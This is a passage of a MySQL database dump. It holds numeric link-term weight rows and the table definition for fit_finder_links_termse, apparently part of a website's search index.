,(110,27569,2.94),(110,27570,2.24),(110,27571,1.07331),(110,27572,0.86331),(110,27573,1.02669),(110,27574,3.73324),(110,27575,1.00331),(110,27576,1.05),(110,27577,2.14662),(110,27578,0.86331),(110,27579,1.14331),(110,27580,0.91),(110,27581,1.09669),(110,27582,1.07331),(110,27583,2.28662),(110,27584,1.02669),(110,27585,0.93331),(110,27586,1.96),(110,27587,0.95669),(110,27588,0.93331),(110,27589,3.92),(110,27590,1.07331),(110,27591,1.05),(110,27592,0.95669),(110,27593,0.98),(110,27594,4.48),(110,27595,2.00662),(110,27596,0.88669),(116,27596,0.88669),(110,27597,1.09669),(110,27598,0.84),(110,27599,0.88669),(110,27600,0.88669),(110,27601,0.98),(110,27602,0.95669),(110,27603,1.09669),(110,27604,1.86662),(110,27605,1.09669),(110,27606,1.07331),(110,27607,0.91),(110,27608,1.09669),(110,27609,0.86331),(123,27609,0.86331),(116,27609,1.72662),(110,27610,1.00331),(110,27611,0.88669),(123,27611,0.88669),(110,27612,1.00331),(110,27613,0.93331),(110,27614,1.07331),(110,27615,1.11993),(110,27616,2.94),(110,27617,1.16669),(110,27618,2.42662),(110,27619,1.86655),(110,27620,5.13345),(110,27621,1.12),(110,27622,2.19338),(110,27623,1.16669),(110,27624,1.07331),(110,27625,0.84),(110,27626,0.98),(110,27627,0.23331),(111,27627,0.23331),(110,27628,0.88669),(110,27629,0.98),(110,27630,1.02669),(110,27631,0.98),(110,27632,0.93331),(110,27633,0.84),(110,27634,0.98),(110,27635,1.68),(110,27636,1.86662),(110,27637,0.86331),(110,27638,0.93331),(110,27639,0.86331),(110,27640,0.95669),(110,27641,0.81669),(110,27642,0.93331),(110,27643,0.98),(110,27644,1.14331),(110,27645,0.93331),(110,27646,0.98),(110,27647,1.00331),(110,27648,1.12),(110,27649,0.95669),(110,27650,0.98),(110,27651,1.07331),(110,27652,1.77338),(110,27653,1.00331),(110,27654,1.09669),(110,27655,2.45007),(110,27656,0.95669),(110,27657,0.95669),(110,27658,1.07331),(110,27659,0.95669),(110,27660,1.09669),(110,27661,0.88669),(110,27662,1.14331),(110,27663,0.18669),(110,27664,0.91),(110,27665,1.14331),(110,27666,0.88669),(110,27667,1.07331),(110,27668,0.98),(110,27669,1.07331),(110,27670,0.28),(110,27671,1.72662),(110,27672,1.16669),(110,27673,0.93331),(110,27674,0.88669),(110,27675,1.05),(110,27676,0.98),(110,27677,1.05),(110,27678,1.07331),(110,27679,1.19),(110,27680,0.93331),(110,27681,1.09669),(110,27682,1.68),(110,27683,1.16669),(110,27684,1.07331),(110,27685,0.95669),(110,27686,1.02669),(110,27687,0.93331),(110,27688,1.02669),(110,27689,1.00331),(110,27690,1.07331),(110,27691,0.98),(110,27692,1.16669),(110,27693,0.81669),(110,27694,0.91),(110,27695,0.86331),(110,27696,1.14331),(110,27697,0.91),(110,27698,0.98),(110,27699,0.91),(110,27700,0.98),(110,27701,0.95669),(110,27702,1.05),(110,27703,0.95669),(110,27704,1.07331),(110,27705,0.95669),(110,27706,1.02669),(110,27707,0.95669),(110,27708,1.02669),(110,27709,0.88669),(110,27710,1.09669),(110,27711,0.95669),(110,27712,1.12),(110,27713,0.91),(110,27714,0.98),(110,27715,0.88669),(110,27716,1.02669),(110,27717,0.98),(110,27718,1.05),(110,27719,0.95669),(110,27720,1.26),(110,27721,1.02669),(110,27722,1.12),(110,27723,0.81669),(110,27724,0.91),(110,27725,0.86331),(110,27726,0.95669),(110,27727,1.02669),(110,27728,1.26),(110,27729,1.00331),(110,27730,1.07331),(110,27731,0.95669),(110,27732,1.02669),(110,27733,0.93331),(110,27734,1.02669),(110,27735,0.93331),(110,27736,1.07331),(110,27737,0.93331),(110,27738,1.07331),(110,27739,0.95669),(110,27740,1.02669),(110,27741,1.96),(110,27742,1.16669),(110,27743,1.09669),(110,27744,0.86331),(110,27745,1.05),(110,27746,3.26676),(110,27747,0.91),(110,27748,2.79993),(110,27749,0.95669),(110,27750,1.09669),(110,27751,0.95669),(110,27752,1.02669),(110,27753,0.84),(110,27754,0.93331),(110,27755,0.86331),(110,27756,0.93331),(110,27757,0.91),(110,27758,1.00331),(110,27759,0.95669),(110,27760,1.02669),(110,27761,0.91),(110,27762,0.98),(110,27763,0.88669),(110,27764,1.00331),(110,27765,1.05),(110,27766,1.12),(110,27767,0.91),(110,27768,0.98),(110,27769,0.91),(110,27770,1.00331),(110,27771,0.84),(110,27772,1.12),(110,27773,0.88669),(110,27774,0.95669),(116,27775,0.88669),(110,27775,3.54676),(110,27776,1.19),(110,27777,1.14331),(110,27778,1.07331),(110,27779,0.95669),(110,27780,1.02669),(110,27781,1.86662),(110,27782,1.07331),(110,27783,1.00331),(110,27784,0.98),(110,27785,1.02669),(110,27786,0.91),(110,27787,1.16669),(110,27788,1.02669),(110,27789,1.12),(110,27790,0.88669),(110,27791,0.95669),(110,27792,1.77338),(110,27793,1.09669),(110,27794,1.07331),(110,27795,0.98),(110,27796,1.07331),(110,27797,1.96),(110,27798,1.07331),(110,27799,1.05),(110,27800,1.86662),(110,27801,1.02669),(110,27802,1.09669),(110,27803,1.86662),(110,27804,2.05338),(110,27805,0.98),(110,27806,1.05),(110,27807,0.98),(110,27808,1.05),(110,27809,1.00331),(110,27810,1.19),(110,27811,1.14331),(110,27812,1.37669),(110,27813,1.96),(110,27814,2.19338),(110,27815,0.95669),(110,27816,1.23669),(110,27817,0.91),(110,27818,1.07331),(110,27819,0.95669),(110,27820,1.02669),(110,27821,1.86662),(110,27822,1.16669),(110,27823,1.16669),(110,27824,1.00331),(110,27825,1.12),(110,27826,0.91),(110,27827,1.12),(110,27828,0.98),(110,27829,1.07331),(110,27830,0.98),(110,27831,1.12),(110,27832,0.98),(110,27833,1.07331),(110,27834,1.02669),(110,27835,1.26),(110,27836,0.98),(110,27837,1.05),(110,27838,0.86331),(110,27839,0.93331),(110,27840,0.93331),(110,27841,0.93331),(110,27842,1.07331),(110,27843,1.00331),(110,27844,0.93331),(110,27845,1.77338),(110,27846,2.28662),(110,27847,0.91),(110,27848,0.98),(110,27849,1.07331),(110,27850,1.00331),(110,27851,1.16669),(110,27852,0.91),(110,27853,0.98),(110,27854,0.84),(110,27855,0.91),(110,27856,0.98),(110,27857,1.05),(110,27858,0.93331),(110,27859,1.02669),(110,27860,1.68),(110,27861,0.93331),(110,27862,0.95669),(110,27863,0.86331),(110,27864,0.95669),(110,27865,0.91),(110,27866,1.00331),(110,27867,1.09669),(110,27868,1.28331),(110,27869,1.05),(110,27870,1.02669),(110,27871,0.60669),(118,27871,0.60669),(128,27871,0.60669),(110,27872,1.23669),(110,27873,1.4),(110,27874,1.14331),(110,27875,1.26),(110,27876,1.19),(110,27877,1.02669),(110,27878,1.12),(110,27879,0.95669),(110,27880,1.07331),(110,27881,1.12),(110,27882,1.26),(110,27883,1.07331),(110,27884,1.35331),(110,27885,0.98),(110,27886,1.19),(110,27887,1.00331),(110,27888,1.14331),(110,27889,1.86662),(110,27890,1.00331),(110,27891,1.02669),(110,27892,1.07331),(110,27893,1.30669),(110,27894,1.07331),(110,27895,1.05),(110,27896,1.07331),(110,27897,0.95669),(110,27898,1.26),(110,27899,0.28),(110,27900,0.95669),(110,27901,1.05),(111,31214,1.58662),(111,31215,0.91),(111,31216,1.12),(111,31217,0.91),(111,31218,1.07331),(111,31219,0.91),(111,31220,1.02669),(111,31221,0.81669),(111,31222,1.00331),(111,31223,0.42),(111,31224,0.95669),(111,31225,1.16669),(111,31226,0.51331),(111,31227,1.02669),(111,31228,1.07331),(114,31229,0.37331),(111,31229,1.11993),(111,31230,0.95669),(114,31230,0.95669),(111,31231,1.07331),(111,31232,1.91338),(111,31233,2.1),(111,31234,0.42),(111,31235,1.05),(111,31236,1.19),(111,31237,0.86331),(111,31238,0.93331),(111,31239,0.86331),(111,31240,0.93331),(111,31241,0.88669),(111,31242,1.07331),(111,31243,0.98),(111,31244,1.02669),(111,31245,0.81669),(121,31245,0.81669),(111,31246,1.12),(111,31247,0.93331),(111,31248,1.14331),(111,31249,0.32669),(111,31250,1.07331),(111,31251,1.16669),(111,31252,0.98),(111,31253,1.07331),(111,31254,0.88669),(111,31255,0.95669),(111,31256,1.72662),(111,31257,0.98),(111,31258,1.07331),(111,31259,0.88669),(111,31260,1.00331),(121,31261,0.18669),(111,31261,0.56007),(111,31262,0.93331),(111,31263,1.09669),(111,31264,0.98),(111,31265,1.05),(111,31266,0.93331),(111,31267,1.00331),(111,31268,1.19),(111,31269,1.33),(111,31270,0.23331),(111,31271,0.86331),(111,31272,1.07331),(111,31273,0.42),(111,31274,1.05),(111,31275,1.16669),(111,31276,0.46669),(111,31277,1.26),(111,31278,1.4),(111,31279,1.02662),(111,31280,1.02669),(111,31281,1.21331),(111,31282,1.05),(111,31283,1.19),(111,31284,0.28),(111,31285,0.98),(111,31286,1.12),(111,31287,0.93331),(111,31288,1.16669),(111,31289,0.37331),(111,31290,1.07331),(111,31291,1.16669),(111,31292,0.60669),(111,31293,1.23669),(111,31294,1.4),(111,31295,2.61324),(111,31296,1.12),(111,31297,1.30669),(111,31298,1.07331),(111,31299,1.26),(111,31300,1.12),(111,31301,1.4),(111,31302,0.42),(111,31303,0.98),(111,31304,1.14331),(111,31305,0.18669),(111,31306,0.91),(111,31307,1.09669),(111,31308,0.23331),(111,31309,1.07331),(111,31310,1.26),(112,32994,0.98),(112,32995,1.07331),(112,32996,1.86662),(112,32997,1.23669),(112,32998,1.16669),(112,32999,0.86331),(112,33000,1.07331),(112,33001,0.91),(112,33002,1.14331),(112,33003,0.84),(112,33004,1.02669),(112,33005,0.86331),(112,33006,0.98),(112,33007,0.98),(112,33008,1.09669),(112,33009,0.81669),(112,33010,0.91),(112,33011,0.98),(112,33012,0.91),(112,33013,1.05),(112,33014,0.95669),(112,33015,0.86331),(112,33016,1.02669),(112,33017,0.32669),(112,33018,0.93331),(112,33019,1.00331),(112,33020,0.86331),(112,33021,1.00331),(112,33022,0.28),(112,33023,0.95669),(112,33024,1.05),(112,33025,0.98),(112,33026,0.95669),(112,33027,0.86331),(112,33028,1.05),(112,33029,0.84),(112,33030,0.91),(112,33031,0.98),(112,33032,1.02669),(112,33033,1.12),(112,33034,0.88669),(112,33035,1.05),(112,33036,0.93331),(112,33037,1.12),(112,33038,0.95669),(112,33039,1.02669),(112,33040,0.91),(125,33040,0.91),(112,33041,1.05),(112,33042,0.81669),(112,33043,0.91),(112,33044,0.95669),(112,33045,1.21331),(112,33046,0.23331),(112,33047,0.88669),(112,33048,0.95669),(112,33049,0.23331),(116,33049,0.23331),(120,33049,0.23331),(112,33050,0.91),(112,33051,1.07331),(113,34363,0.37331),(113,34364,1.02669),(113,34365,1.16669),(113,34366,0.95669),(113,34367,1.07331),(113,34368,0.91),(113,34369,0.98),(113,34370,1.91338),(113,34371,1.09669),(113,34372,1.16669),(113,34373,0.91),(113,34374,1.00331),(113,34375,0.88669),(113,34376,1.02669),(113,34377,0.93331),(113,34378,0.98),(113,34379,1.12),(113,34380,1.21331),(113,34381,0.93331),(113,34382,1.05),(113,34383,0.86331),(113,34384,0.95669),(113,34385,0.88669),(113,34386,0.95669),(113,34387,1.00331),(113,34388,0.98),(113,34389,1.12),(113,34390,0.95669),(113,34391,1.07331),(113,34392,0.93331),(113,34393,1.05),(113,34394,0.98),(113,34395,0.88669),(113,34396,1.05),(113,34397,1.02669),(113,34398,1.16669),(113,34399,0.91),(113,34400,0.95669),(113,34401,0.91),(113,34402,1.05),(113,34403,0.86331),(113,34404,1.09669),(113,34405,0.93331),(113,34406,1.05),(113,34407,0.88669),(113,34408,0.98),(113,34409,0.95669),(113,34410,1.16669),(113,34411,1.00331),(113,34412,1.12),(113,34413,0.98),(113,34414,1.14331),(113,34415,0.98),(113,34416,1.05),(113,34417,1.02669),(113,34418,1.09669),(113,34419,1.00331),(113,34420,1.12),(113,34421,0.32669),(113,34422,1.02669),(113,34423,1.30669),(113,34424,0.32669),(113,34425,1.09669),(113,34426,1.16669),(113,34427,0.95669),(113,34428,1.02669),(113,34429,0.95669),(113,34430,1.19),(113,34431,0.88669),(113,34432,0.98),(113,34433,1.00331),(113,34434,1.14331),(113,34435,0.84),(113,34436,0.91),(113,34437,0.91),(113,34438,0.98),(113,34439,0.91),(113,34440,1.07331),(113,34441,0.37331),(113,34442,1.05),(113,34443,1.19),(113,34444,0.95669),(113,34445,1.09669),(113,34446,0.23331),(113,34447,0.88669),(113,34448,0.95669),(113,34449,0.91),(113,34450,1.02669),(113,34451,1.05),(113,34452,1.16669),(113,34453,0.93331),(113,34454,0.98),(113,34455,1.07331),(113,34456,1.19),(113,34457,0.95669),(113,34458,1.05),(113,34459,0.93331),(113,34460,1.09669),(113,34461,0.88669),(113,34462,1.02669),(113,34463,0.88669),(113,34464,1.02669),(114,35642,0.84),(114,35643,0.88669),(114,35644,1.02669),(114,35645,0.95669),(114,35646,1.23669),(114,35647,0.81669),(114,35648,0.93331),(114,35649,0.37331),(114,35650,1.05),(114,35651,0.28),(114,35652,0.42),(114,35653,1.05),(114,35654,1.21331),(114,35655,0.23331),(114,35656,0.95669),(114,35657,1.05),(114,35658,0.91),(114,35659,1.07331),(114,35660,1.02669),(114,35661,1.16669),(114,35662,0.37331),(114,35663,1.02669),(114,35664,1.12),(116,36521,0.98),(117,36534,0.51331),(125,36565,0.86331),(116,37358,0.91),(116,37359,1.09669),(116,37360,0.88669),(116,37361,1.12),(116,37362,0.91),(116,37363,1.05),(116,37364,0.93331),(116,37365,1.02669),(116,37366,0.91),(116,37367,1.02669),(116,37368,0.95669),(116,37369,1.05),(116,37370,0.93331),(116,37371,1.14331),(116,37372,0.84),(119,37372,0.84),(116,37373,1.05),(116,37374,0.93331),(116,37375,1.05),(116,37376,0.98),(116,37377,1.12),(116,37378,1.00331),(116,37379,0.98),(116,37380,0.91),(120,37380,0.91),(116,37381,1.02669),(116,37382,0.98),(116,37383,0.98),(116,37384,1.77338),(116,37385,1.05),(116,37386,1.05),(116,37387,0.93331),(116,37388,1.02669),(116,37389,0.93331),(116,37390,0.95669),(116,37391,1.05),(116,37392,0.88669),(116,37393,1.00331),(116,37394,0.95669),(116,37395,1.07331),(116,37396,1.00331),(116,37397,1.07331),(116,37398,0.86331),(116,37399,1.05),(116,37400,1.05),(116,37401,0.98),(116,37402,1.07331),(116,37403,0.98),(116,37404,1.05),(116,37405,1.91338),(116,37406,1.02669),(116,37407,1.07331),(116,37408,0.95669),(116,37409,1.02669),(116,37410,0.28),(118,37410,0.28),(116,37411,0.93331),(116,37412,1.16669),(116,37413,1.12),(116,37414,1.19),(116,37415,1.00331),(116,37416,1.09669),(116,37417,0.88669),(116,37418,0.98),(117,38486,0.79331),(117,38487,1.02669),(117,38488,1.96),(117,38489,0.95669),(117,38490,1.09669),(117,38491,0.93331),(117,38492,1.02669),(117,38493,0.84),(117,38494,0.93331),(117,38495,0.86331),(117,38496,1.05),(117,38497,0.88669),(117,38498,1.02669),(117,38499,0.98),(117,38500,1.09669),(117,38501,0.86331),(117,38502,1.02669),(117,38503,0.88669),(117,38504,1.00331),(117,38505,1.02669),(117,38506,1.30669),(117,38507,0.79331),(117,38508,0.88669),(117,38509,0.18669),(117,38510,0.91),(117,38511,0.95669),(117,38512,0.86331),(117,38513,0.98),(117,38514,0.93331),(117,38515,1.05),(117,38516,1.12),(117,38517,1.21331),(117,38518,0.84),(117,38519,0.91),(117,38520,0.79331),(117,38521,0.84),(117,38522,0.86331),(117,38523,0.98),(117,38524,0.86331),(117,38525,0.93331),(117,38526,0.88669),(117,38527,1.02669),(117,38528,1.14331),(117,38529,1.21331),(117,38530,0.32669),(119,38530,0.32669),(117,38531,0.93331),(119,38531,0.93331),(117,38532,1.07331),(117,38533,0.81669),(117,38534,0.95669),(117,38535,0.86331),(117,38536,1.05),(117,38537,1.19),(117,38538,1.02669),(117,38539,1.19),(117,38540,0.23331),(117,38541,0.88669),(117,38542,0.95669),(117,38543,1.09669),(117,38544,1.21331),(117,38545,0.91),(117,38546,1.12),(117,38547,0.93331),(117,38548,1.12),(117,38549,0.95669),(117,38550,0.84),(117,38551,0.88669),(117,38552,1.00331),(117,38553,1.09669),(117,38554,1.12),(117,38555,1.23669),(117,38556,0.95669),(117,38557,1.05),(117,38558,0.95669),(117,38559,1.05),(118,39510,0.91),(118,39511,1.00331),(118,39512,0.88669),(118,39513,1.05),(118,39514,0.93331),(118,39515,1.05),(118,39516,0.86331),(118,39517,0.98),(118,39518,2.00662),(118,39519,1.12),(118,39520,1.19),(118,39521,0.91),(118,39522,1.05),(118,39523,0.95669),(118,39524,0.98),(118,39525,0.88669),(118,39526,0.98),(118,39527,0.88669),(118,39528,1.07331),(118,39529,0.93331),(118,39530,0.93331),(118,39531,1.16669),(118,39532,1.05),(118,39533,1.16669),(118,39534,0.32669),(118,39535,0.93331),(118,39536,1.07331),(118,39537,1.09669),(118,39538,1.21331),(118,39539,0.93331),(118,39540,1.05),(118,39541,0.32669),(118,39542,1.00331),(118,39543,1.09669),(119,40563,0.81669),(119,40564,1.05),(119,40565,1.00331),(119,40566,1.09669),(119,40567,0.98),(119,40568,0.93331),(119,40569,1.05),(119,40570,1.96),(119,40571,1.07331),(119,40572,1.16669),(119,40573,0.93331),(119,40574,1.02669),(119,40575,1.02669),(119,40576,0.84),(119,40577,0.88669),(119,40578,0.95669),(119,40579,1.14331),(119,40580,0.32669),(119,40581,0.93331),(119,40582,1.12),(119,40583,0.37331),(119,40584,0.95669),(119,40585,1.05),(119,40586,0.91),(119,40587,1.05),(119,40588,0.88669),(119,40589,0.81669),(119,40590,0.98),(119,40591,0.86331),(119,40592,1.12),(119,40593,0.93331),(119,40594,1.09669),(119,40595,0.95669),(119,40596,0.91),(119,40597,1.02669),(119,40598,0.91),(119,40599,1.00331),(119,40600,0.91),(119,40601,1.05),(119,40602,1.00331),(119,40603,1.07331),(119,40604,0.88669),(119,40605,1.00331),(119,40606,1.12),(119,40607,0.98),(119,40608,1.05),(119,40609,0.32669),(120,40609,0.32669),(119,40610,1.07331),(119,40611,1.16669),(119,40612,0.98),(119,40613,1.21331),(119,40614,0.93331),(119,40615,1.14331),(119,40616,0.93331),(119,40617,0.88669),(119,40618,0.95669),(120,42299,0.28),(120,42300,0.93331),(120,42301,1.14331),(120,42302,0.98),(120,42303,0.95669),(120,42304,0.91),(120,42305,1.07331),(120,42306,0.95669),(120,42307,1.19),(120,42308,0.93331),(120,42309,1.12),(120,42310,1.07331),(120,42311,1.19),(120,42312,0.98),(120,42313,1.07331),(120,42314,0.91),(120,42315,1.12),(120,42316,0.88669),(120,42317,0.95669),(120,42318,0.95669),(120,42319,0.93331),(120,42320,1.09669),(120,42321,0.98),(120,42322,1.00331),(120,42323,1.16669),(120,42324,0.88669),(120,42325,1.02669),(120,42326,0.95669),(120,42327,1.05),(120,42328,0.93331),(120,42329,1.05),(120,42330,0.95669),(120,42331,0.95669),(120,42332,1.09669),(120,42333,1.05),(120,42334,0.93331),(120,42335,1.05),(120,42336,0.98),(120,42337,1.00331),(120,42338,0.91),(120,42339,1.23669),(120,42340,0.93331),(120,42341,1.07331),(120,42342,0.84),(120,42343,1.02669),(120,42344,0.88669),(120,42345,1.02669),(120,42346,0.88669),(120,42347,1.00331),(120,42348,0.84),(120,42349,0.93331),(120,42350,0.98),(120,42351,1.19),(120,42352,0.86331),(120,42353,0.93331),(120,42354,0.95669),(120,42355,1.05),(120,42356,1.00331),(120,42357,1.09669),(120,42358,1.05),(120,42359,1.28331),(120,42360,0.37331),(120,42361,1.07331),(120,42362,1.21331),(120,42363,1.00331),(128,42363,1.00331),(120,42364,1.21331),(120,42365,0.28),(120,42366,0.98),(120,42367,1.09669),(120,42368,0.84),(120,42369,0.93331),(120,42370,0.91),(120,42371,1.07331),(120,42372,0.91),(120,42373,1.00331),(120,42374,0.88669),(120,42375,0.95669),(120,42376,0.32669),(120,42377,0.93331),(120,42378,1.02669),(120,42379,0.98),(120,42380,0.88669),(120,42381,0.95669),(120,42382,0.32669),(120,42383,0.95669),(120,42384,1.16669),(120,42385,0.51331),(120,42386,1.05),(120,42387,1.23669),(120,42388,1.00331),(120,42389,1.16669),(121,43314,1.02669),(121,43315,0.86331),(121,43316,1.02669),(121,43317,1.00331),(121,43318,1.07331),(121,43319,0.46669),(121,43320,1.12),(121,43321,1.16669),(121,43322,2.4666),(121,43323,3),(121,43324,0.79339),(121,43325,2.55),(121,43326,2.94661),(123,45083,1.00331),(123,45084,1.30669),(123,45085,0.14),(123,45086,0.84),(123,45087,1.23669),(123,45088,0.84),(123,45089,1.02669),(123,45090,0.86331),(123,45091,1.02669),(123,45092,0.86331),(123,45093,0.95669),(123,45094,0.95669),(123,45095,1.05),(123,45096,1.00331),(123,45097,0.93331),(123,45098,1.12),(123,45099,1.07331),(123,45100,1.82),(123,45101,2.1),(123,45102,0.88669),(123,45103,1.12),(123,45104,1.86662),(123,45105,2.00662),(123,45106,0.28),(123,45107,1.09669),(123,45108,1.28331),(128,46552,0.91),(126,46572,0.86331),(125,47889,0.95669),(125,47890,0.93331),(125,47891,0.91),(125,47892,1.09669),(125,47893,1.19),(125,47894,0.98),(125,47895,1.09669),(125,47896,0.86331),(125,47897,1.00331),(125,47898,0.98),(125,47899,1.14331),(125,47900,1.00331),(125,47901,0.95669),(125,47902,0.95669),(125,47903,0.86331),(125,47904,1.05),(125,47905,0.28),(125,47906,0.93331),(125,47907,1.16669),(125,47908,0.91),(125,47909,1.07331),(125,47910,0.93331),(125,47911,0.84),(125,47912,0.91),(125,47913,1.02669),(125,47914,1.19),(125,47915,1.02669),(125,47916,1.09669),(125,47917,0.93331),(125,47918,1.00331),(125,47919,0.28),(125,47920,0.93331),(125,47921,1.05),(125,47922,0.60669),(125,47923,1.14331),(125,47924,1.33),(125,47925,0.86331),(126,47925,0.86331),(125,47926,1.07331),(125,47927,0.98),(125,47928,1.12),(125,47929,1.05),(125,47930,0.95669),(126,48873,0.91),(126,48874,0.81669),(126,48875,0.98),(126,48876,0.95669),(126,48877,1.02669),(126,48878,1.07331),(126,48879,1.19),(126,48880,0.91),(126,48881,1.05),(126,48882,0.95669),(126,48883,0.95669),(126,48884,1.07331),(126,48885,1.07331),(126,48886,0.88669),(126,48887,1.02669),(126,48888,0.88669),(126,48889,1.14331),(126,48890,0.86331),(126,48891,0.98),(126,48892,0.91),(126,48893,1.05),(126,48894,1.09669),(126,48895,1.68),(126,48896,2.19338),(126,48897,0.98),(126,48898,0.95669),(126,48899,0.86331),(126,48900,1.00331),(126,48901,0.98),(126,48902,1.00331),(126,48903,1.07331),(126,48904,0.37331),(126,48905,1.14331),(126,48906,1.33),(126,48907,0.91),(126,48908,1.00331),(128,51074,0),(128,51564,0.86331),(128,51565,1.00331),(128,51566,0.86331),(128,51567,1.07331),(128,51568,0.84),(128,51569,0.98),(128,51570,0.88669),(128,51571,0.98),(128,51572,1.77338),(128,51573,1.00331),(128,51574,0.98),(128,51575,1.14331),(128,51576,0.86331),(128,51577,1.05),(128,51578,0.93331),(128,51579,0.98),(128,51580,0.56),(128,51581,1.33),(128,51582,1.33),(128,51583,1.4),(128,51584,1.16669),(128,51585,0.88669),(128,51586,0.98),(128,51587,1.07331),(128,51588,1.26),(128,51589,0.98),(128,51590,1.14331),(128,51591,0.86331),(128,51592,1.00331),(128,51593,0.88669),(128,51594,0.98),(128,51595,0.60669),(128,51596,1.14331),(128,51597,1.21331),(133,52484,0.95669),(133,52485,1.16669),(133,52486,0.98),(133,52487,1.07331),(133,52488,1.02669),(133,52489,1.23669),(133,52490,1.00331),(133,52491,1.00331),(134,52690,0.86331),(134,52691,0.93331),(134,52692,1.19),(134,52693,0.93331),(134,52694,0.93331),(134,52695,1.07331),(134,52696,0.28),(134,52697,1.12),(134,52698,1.33),(134,52699,0.95669),(134,52700,1.05),(134,52701,0.98); /*!40000 ALTER TABLE `fit_finder_links_termsd` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_termse` -- DROP TABLE IF EXISTS `fit_finder_links_termse`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_termse` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_termse` -- LOCK TABLES `fit_finder_links_termse` WRITE; /*!40000 ALTER TABLE `fit_finder_links_termse` DISABLE KEYS */; INSERT INTO `fit_finder_links_termse` VALUES (2,29,0.39996),(3,29,0.39996),(5,29,0.39996),(9,29,0.39996),(20,29,0.39996),(21,29,0.39996),(22,29,0.39996),(23,29,0.39996),(24,29,0.39996),(25,29,0.39996),(35,29,0.39996),(40,29,0.39996),(52,29,0.39996),(55,29,0.39996),(58,29,0.39996),(68,29,0.39996),(77,29,0.39996),(103,29,0.39996),(104,29,0.39996),(105,29,0.39996),(106,29,0.39996),(107,29,0.39996),(109,29,0.39996),(110,29,0.39996),(111,29,0.39996),(112,29,0.39996),(113,29,0.39996),(114,29,0.39996),(116,29,0.39996),(117,29,0.39996),(118,29,0.39996),(119,29,0.39996),(120,29,0.39996),(121,29,0.39996),(123,29,0.39996),(125,29,0.39996),(126,29,0.39996),(128,29,0.39996),(129,29,0.39996),(130,29,0.39996),(133,29,0.39996),(134,29,0.39996),(3,113,0.37338),(3,114,0.98),(3,115,1.09669),(3,116,0.95669),(3,117,1.12),(3,118,0.74676),(3,119,0.86331),(3,120,1.09669),(3,121,0.93331),(3,122,1.00331),(3,123,1.77338),(3,124,2.00662),(3,125,0.37338),(3,126,0.88669),(3,127,1.05),(3,128,1.09669),(3,129,1.26),(3,130,0.18669),(3,131,0.91),(3,132,1.09669),(3,133,0.18669),(3,134,0.95669),(3,135,1.09669),(3,136,0.14),(114,136,0.14),(3,137,0.91),(3,138,1.14331),(3,139,0.09331),(110,139,0.09331),(125,139,0.27993),(3,140,0.93331),(3,141,1.07331),(3,142,0.23331),(3,143,0.88669),(3,144,1.05),(112,283,0.18669),(126,283,0.37338),(104,283,0.74676),(3,283,0.98679),(3,284,0.28),(3,285,0.91),(3,286,1.12),(3,287,0.28),(3,288,1.00331),(3,289,1.09669),(3,290,0.56),(3,291,1.02669),(3,292,1.26),(3,293,0.95669),(3,294,1.02669),(52,295,0.0175),(9,295,0.035),(40,295,0.035),(114,295,0.0525),(134,295,0.0525),(111,295,0.07),(121,295,0.07),(3,295,0.0925),(128,295,0.105),(133,295,0.14),(118,295,0.245),(116,295,0.2625),(68,295,0.2975),(125,295,0.2975),(104,295,0.35),(106,295,0.35),(35,295,0.4025),(112,295,0.4025),(123,295,0.4025),(117,295,0.42),(126,295,0.42),(119,295,0.455),(107,295,0.56),(113,295,0.56),(105,295,0.63),(120,295,0.77),(103,295,0.8225),(110,295,2.1875),(104,296,0.88669),(3,296,4.68679),(3,297,0.42),(3,298,1.12),(3,299,1.30669),(3,300,0.28),(3,301,0.93331),(3,302,1.09669),(5,389,0.32669),(5,390,1.02669),(5,391,1.21331),(5,392,0.14),(126,392,0.14),(110,392,0.28),(5,393,0.98),(5,394,1.02669),(5,395,0.37331),(5,396,0.93331),(5,397,1.12),(9,466,0.18669),(55,466,0.18669),(111,466,0.18669),(112,466,0.18669),(120,466,0.18669),(21,466,0.5334),(9,467,0.86331),(120,467,0.86331),(9,468,1.00331),(120,558,0.86331),(121,558,0.86331),(9,558,1.72662),(9,559,1.91338),(9,560,0.42),(116,560,0.42),(9,561,0.98),(116,561,0.98),(9,562,1.19),(40,563,0.02338),(9,563,0.03507),(133,563,0.03507),(111,563,0.04676),(134,563,0.04676),(106,563,0.05845),(128,563,0.07014),(35,563,0.08183),(68,563,0.08183),(123,563,0.08183),(118,563,0.09352),(126,563,0.10521),(104,563,0.1169),(116,563,0.1169),(105,563,0.12859),(125,563,0.17535),(107,563,0.18704),(112,563,0.18704),(119,563,0.19873),(113,563,0.21042),(117,563,0.24549),(103,563,0.38577),(120,563,0.42084),(110,563,0.82999),(9,564,0.88669),(104,564,0.88669),(9,565,0.93331),(9,566,0.91),(9,567,1.00331),(116,1774,0.84),(125,1774,0.84),(35,1774,1.68),(35,1775,1.02669),(21,3035,3.2),(35,9219,0.18669),(35,9220,0.93331),(35,9221,1.05),(35,9390,0.46669),(35,9391,1.00331),(35,9392,1.09669),(35,9393,0.23331),(35,9394,0.91),(35,9395,1.05),(35,9396,0.28),(107,9396,0.56),(35,9397,0.91),(35,9398,1.16669),(35,9399,0.51331),(35,9400,1.05),(35,9401,1.28331),(35,9402,0.56),(128,9402,0.56),(35,9403,0.93331),(35,9404,1.09669),(35,9405,1.00331),(35,9406,1.07331),(35,9407,0.32669),(35,9408,0.95669),(35,9409,1.23669),(35,9410,0.93338),(35,9411,1.00331),(35,9412,1.12),(35,9413,1.00331),(35,9414,1.19),(113,9415,0.51331),(117,9415,0.51331),(120,9415,0.51331),(134,9415,0.51331),(35,9415,1.02662),(35,9416,1.02669),(134,9416,1.02669),(35,9417,1.14331),(35,9418,1.05),(35,9419,1.19),(35,9420,0.37331),(35,9421,1.07331),(35,9422,1.23669),(35,9423,0.84),(35,9424,1.07331),(35,9425,1.14331),(35,9426,1.00331),(35,9427,1.12),(35,9428,0.46669),(35,9429,1.02669),(35,9430,1.33),(35,9825,0.18669),(103,9825,0.18669),(104,9825,0.18669),(110,9825,0.18669),(113,9825,0.18669),(117,9825,0.18669),(120,9825,0.18669),(125,9825,0.18669),(35,9826,0.91),(35,9827,0.98),(35,9828,0.23331),